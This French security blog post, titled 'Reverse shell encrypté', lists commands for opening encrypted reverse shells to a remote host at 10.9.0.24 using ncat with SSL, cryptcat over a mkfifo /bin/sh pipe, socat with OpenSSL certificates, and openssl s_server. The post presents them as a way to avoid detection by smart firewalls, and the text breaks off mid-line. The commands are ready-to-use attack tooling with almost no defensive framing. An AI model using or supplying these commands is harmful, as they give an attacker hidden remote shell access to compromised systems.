Reverse shell encrypté - Sécuriser votre site

1.0Sécuriser votre sitehttps://www.searchevolution.com/securityGermainhttps://www.searchevolution.com/security/author/germain/Reverse shell encrypté - Sécuriser votre siterich600338<blockquote class="wp-embedded-content" data-secret="GjCqtLlfDP"><a href="https://www.searchevolution.com/security/2021/07/29/reverse-shell-encrypte/">Reverse shell encrypté</a></blockquote><iframe sandbox="allow-scripts" security="restricted" src="https://www.searchevolution.com/security/2021/07/29/reverse-shell-encrypte/embed/#?secret=GjCqtLlfDP" width="600" height="338" title="« Reverse shell encrypté » — Sécuriser votre site" data-secret="GjCqtLlfDP" frameborder="0" marginwidth="0" marginheight="0" scrolling="no" class="wp-embedded-content"></iframe><script type="text/javascript"> /* <![CDATA[ */ /*! This file is auto-generated */ !function(d,l){"use strict";l.querySelector&&d.addEventListener&&"undefined"!=typeof URL&&(d.wp=d.wp||{},d.wp.receiveEmbedMessage||(d.wp.receiveEmbedMessage=function(e){var t=e.data;if((t||t.secret||t.message||t.value)&&!/[^a-zA-Z0-9]/.test(t.secret)){for(var s,r,n,a=l.querySelectorAll('iframe[data-secret="'+t.secret+'"]'),o=l.querySelectorAll('blockquote[data-secret="'+t.secret+'"]'),c=new RegExp("^https?:$","i"),i=0;i<o.length;i++)o[i].style.display="none";for(i=0;i<a.length;i++)s=a[i],e.source===s.contentWindow&&(s.removeAttribute("style"),"height"===t.message?(1e3<(r=parseInt(t.value,10))?r=1e3:~~r<200&&(r=200),s.height=r):"link"===t.message&&(r=new URL(s.getAttribute("src")),n=new URL(t.value),c.test(n.protocol))&&n.host===r.host&&l.activeElement===s&&(d.top.location.href=t.value))}},d.addEventListener("message",d.wp.receiveEmbedMessage,!1),l.addEventListener("DOMContentLoaded",function(){for(var e,t,s=l.querySelectorAll("iframe.wp-embedded-content"),r=0;r<s.length;r++)(t=(e=s[r]).getAttribute("data-secret"))||(t=Math.random().toString(36).substring(2,12),e.src+="#?secret="+t,e.setAttribute("data-secret",t)),e.contentWindow.postMessage({message:"ready",secret:t},"*")},!1)))}(window,document); /* ]]> */ </script> Netcat (nc) ne supporte l’encryption et cela permet d’être détecté facilement (firewall intelligent). Voici donc quelques façons d’améliorer la confidentialité des communications ncat apt install ncat ncat -l 443 --ssl -v ncat 10.9.0.24 --ssl -e /bin/bash -v cryptcat cryptcat -lvp 4444 -k mysecretkey rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|cryptcat 10.9.0.24 4444 -k mysecretkey >/tmp/f socat openssl req -newkey rsa:2048 -nodes -keyout r0cker.key -x509 -days 1000 -subj '/CN=www.r0cker.local/O=Best Tech./C=CA' -out r0cker.crt cat r0cker.key r0cker.crt > r0cker.pem socat -d -d OPENSSL-LISTEN:4443,cert=r0cker.pem,verify=0,fork STDOUT socat OPENSSL:10.9.0.24:4443,verify=0 EXEC:/bin/bash openssl reverse shell openssl s_server -quiet -key r0cker.pem -cert r0cker.pem -port 5555 #voir la section socat pour